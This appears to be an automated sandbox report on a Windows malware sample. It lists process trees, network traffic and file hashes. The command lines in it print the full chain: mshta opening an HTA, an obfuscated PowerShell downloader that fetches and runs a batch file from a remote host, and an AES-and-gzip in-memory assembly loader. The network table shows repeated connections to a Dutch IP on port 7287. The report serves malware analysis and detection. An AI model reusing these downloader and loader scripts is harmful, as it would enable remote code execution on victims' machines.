"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.12.1487225003\675476188" -childID 11 -isForBrowser -prefsHandle 6968 -prefMapHandle 6964 -prefsLen 27816 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e85508ba-addf-4b88-947e-fd370e035bb2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6976 2e2a5bbe258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.13.1180940323\1997716798" -childID 12 -isForBrowser -prefsHandle 6040 -prefMapHandle 5956 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ec513b2-3673-4470-b3ef-251a8ae8dcf2} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 6056 2e2a5971858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.14.1840811761\1315247919" -childID 13 -isForBrowser -prefsHandle 6092 -prefMapHandle 5692 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {856cd291-dc3a-42b0-88b2-1e5aa830bba5} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 8148 2e2a5df8258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.15.1536033044\310627983" -childID 14 -isForBrowser -prefsHandle 6652 -prefMapHandle 6700 -prefsLen 28217 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b9b3bf0-6f97-4a4c-b559-d964be68553c} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 7724 2e2a4b94a58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.16.615557995\1179932124" -childID 15 -isForBrowser -prefsHandle 7992 -prefMapHandle 6700 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b80b8ef-e7b3-4a6b-8e67-22d19d179b12} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 5436 2e2a4eb4b58 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\index.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Note.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\15.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\15.bat"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.17.1721563505\970642768" -childID 16 -isForBrowser -prefsHandle 1288 -prefMapHandle 7468 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7c8016a-e570-4d3f-88db-dfe68a2b2196} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 4692 2e2a8e1b358 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\15.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Downloads\15.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 
6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\15.bat
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.18.613164890\1751689591" -childID 17 -isForBrowser -prefsHandle 7844 -prefMapHandle 6404 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c038c7b-35d0-4a97-b254-684fa5a3c099} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3600 2e2aaf7f858 tab
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\jiteon.xlsx"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| N/A | 127.0.0.1:54846 | | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 35.83.153.5:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 128.96.222.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.153.83.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | berryz.upnl.org | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | berryz.upnl.org | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | berryz.upnl.org | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| N/A | 127.0.0.1:54855 | | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.32.21:80 | virustotal.com | tcp |
| US | 216.239.32.21:80 | virustotal.com | tcp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 8.8.8.8:53 | virustotal.com | udp |
| US | 216.239.32.21:443 | virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| GB | 142.250.180.3:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | 21.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.34.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 72.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:7287 | 193.222.96.128 | tcp |
| NL | 193.222.96.128:4449 | | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| NL | 193.222.96.128:7287 | | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| NL | 193.222.96.114:7287 | 193.222.96.114 | tcp |
| US | 8.8.8.8:53 | 114.96.222.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | upnl.org | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
| GB | 142.250.200.35:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | ghs-svc-https-c46.ghs-ssl.googlehosted.com | udp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 693ff32e4cd773f59817c7b3639281b3 |
| SHA1 | 60051804fd3d8ffd383a1231f1ed6ec5a0e0b36a |
| SHA256 | 460980fc6371a63ae9ed9d780e92bb009b5d89e6ea58e8d6b2dc1f349e2f7fda |
| SHA512 | 9f83776d152be6a6c0adf5190aef88a03b4e2048544f5cd1188d836e1e4dfcf8661de1158d7dcffedaa7bc6e0e7beb32733cb9597842a0015338d2d577a79197 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs.js
| MD5 | 79a5f7718408e1c574181045c3006fa4 |
| SHA1 | 9c84a78d7f434cd6df4ed2ca621cffa21bed9bd6 |
| SHA256 | 2e8ff6d17d34689bee6a4c4554f1bf74394c64006c99cadfadb9ab7bf3c2d35c |
| SHA512 | 040b9be08a0d9d9904d79e5f8ea8f6dca5a5c5d2f8f6dbbb80b7637407ecf53aa9537286e9b17d15737284e67e7b9b2c9a7e67f4fb6764422dd7b23aa228db64 |
C:\Users\Admin\Downloads\15.9xj2mza4.bat.part
| MD5 | 35c6d717dae5b57fdaf92e00d1002b73 |
| SHA1 | 88111931546999a17cf45b2d1b4d65698d9d4fb4 |
| SHA256 | 63f7b147b822af439064d521b1e3aeef276d835878cb5236bb8589d7a006dd91 |
| SHA512 | 3374b3e1d3c2c01683300029c8d5b31bc3221854a76326d060b9e67c3cbdc38502c64b108da68fa7f030ce45d48bf7a2494bbd2ce71c97b4b9459fb12b5012a0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 9d45577855de876aa82d2816d5c0da84 |
| SHA1 | 58efc74b99f8e36891a4baac33bfbbe1978c4f33 |
| SHA256 | 0b963e26440f07e7bb70c825fa15448ed91ca64237b400adc4cb9c1a01632b1c |
| SHA512 | 7dff483423f85775f66db8665db4c6ccb20010708ea6398ae2751ff619701396c6d0ba422bb5d83d1f817e1f9c97f63681ed9062c18d5bdda0dd200da2b62fc1 |
C:\Users\Admin\Downloads\j8Xy3EYT.part
| MD5 | c4c06bc09d5d07d8abdb074e80806d07 |
| SHA1 | fd49f1d6c2fb26415c90b9e352b288f16e169b6c |
| SHA256 | c5010ef902c9a8421aaf07a4ac475667c0b2ddae0b2d4c2f4c28aa7b7f482b3d |
| SHA512 | 6a8eb776b68d500645b1b4bbc4440e8e24e6f8340e3fe560ae96b8c127b26bd3a678782306e4b049aa9d4a1fc120f782307ac2ae166c84bcf73cffcd451a0626 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js
| MD5 | 225b9b48729c3baf4366d4a7c279db3c |
| SHA1 | 38ebcb2738c9310104a241d3f56222ac589db7d6 |
| SHA256 | 7e03479ae01177c4ba7e920cfde5016e22378df53b5b6faf3a403a7946797620 |
| SHA512 | 900414ca4ac8331a08563afe87322a31786e114aaafba0130ce82556d6663e557306cae0662a603df6288d58ade1e599c9167ce47b31c85b387956149c5ccafb |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a9422c71a8a8f6de90613d8206318cb5 |
| SHA1 | 79cacd76c1a999753129303f604f9f95cb6651b7 |
| SHA256 | 0a470c0602d97da0e9a4b89b8c5b121bc34bea9b7cf244ace54b61f56eaf4047 |
| SHA512 | 5f0cb53736c48e8e4dd1caad8997c2191d8839b37789715ca4574ee3d99ceabf1480b7713113c82047e8d15bd41820e5aed326d0388baeed6bdbd919a0c3fe2b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\209\{3cf30eb4-7f1e-4325-974c-30091a54e2d1}.final
| MD5 | c366a3613bd3d6329d43d12117ed4059 |
| SHA1 | d3e8e59672d2ce345769afd88a71fbb90d70943d |
| SHA256 | 582807864cf6905f2404f2bb7e84789d15afbb0bd5c9566e04cf7b8cb6c29a7b |
| SHA512 | 7087bec44839f155caa8a57a65d4fcc117796edb80a991a9bcea620be9d0a497841148f36f09fa4995ef4dd7bd65c566760ff9f32c48a154fb3cacf1737a127a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js
| MD5 | 9abc33b8ca1a06578ef8bca71ec43322 |
| SHA1 | 82c782e8fa7e29c59105cb5bb36b99f7dde34007 |
| SHA256 | 95ec09b5183c0491b2b70f2ef4fbc227ad2b2775d1b814a527015120a436455e |
| SHA512 | dabcd6aad39d47a0a2e3bba424477e9b38f6fb903db1a29bb81e91b942a16617111449cedecbe9256ec550b981f29358f02c673fd035fd0e07f6a9686e2fc521 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 024791c1cdd8a03038756126fa4a173c |
| SHA1 | 1d34791566889fbc7b846e785df9cb461e834a9b |
| SHA256 | a69a842dc910a3cc41849f0b66047e4b2debd9473562c2350444f9dc56f9cd31 |
| SHA512 | 6f98b42a0cf7967e22a15e78803887327240f17300d3a808a3c74aef4236a005db41ce78c4bcf1d6c45e377447385b5f92b3170c3749f073386bb5a22a6498e2 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\CD429C0BD381706883301C98CDE6E7D5C78016A3
| MD5 | 4861e569d02d0c578984183cd651ffe5 |
| SHA1 | 4e4dd04189d00c245c6e9dbcba9604a9177756cf |
| SHA256 | 6654c00b3a1f8791b4811c56c4efef1e28d95c1e98b3f98ac9a4ec35d6663c2b |
| SHA512 | 68f5ff9dfa9d9e5dc3b35538d715db0231bee9ef67adf0503e0a5379da69d9a4dceaba980ad41faec6c14dbe818784144ad05d277a2b41b18b9e1853f5a3be03 |
